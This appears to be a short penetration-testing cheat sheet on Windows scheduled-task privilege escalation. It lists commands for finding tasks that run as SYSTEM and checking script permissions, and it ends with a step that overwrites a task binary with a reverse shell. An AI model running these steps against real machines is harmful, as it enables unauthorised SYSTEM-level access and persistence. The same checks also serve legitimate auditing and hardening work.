SCHEDULED TASKS

List scheduled tasks

All scheduled tasks — Tasks running as SYSTEM

schtasks /query /fo LIST /v
Get-ScheduledTask
Example Output
schtasks /query /fo LIST /v | findstr /i 'taskname\|run as\|task to run'
TaskName: \CustomBackup
Run As User: SYSTEM
Task To Run: C:\Scripts\backup.bat
(Runs as SYSTEM - check if script is writable)

Writable task scripts

Can you modify the script? — Runs as task owner

Check permissions on scripts referenced by tasks
icacls <script_path>
Example Output
schtasks /query /fo LIST /v | findstr /i 'task\|run\|author'
TaskName: \Backup
Run As User: SYSTEM
Task To Run: C:\Scripts\backup.bat

icacls C:\Scripts\backup.bat
BUILTIN\Users:(F)  <- FULL CONTROL!
(Modify script, wait for execution)

Task binary replacement

Replace with reverse shell — Waits for next scheduled run

If task runs a binary you can overwrite
Example Output
Task runs: C:\Scripts\app.exe
icacls C:\Scripts\app.exe -> Users:(F)

copy C:\temp\rev.exe C:\Scripts\app.exe /Y
(Wait for scheduled run or trigger manually)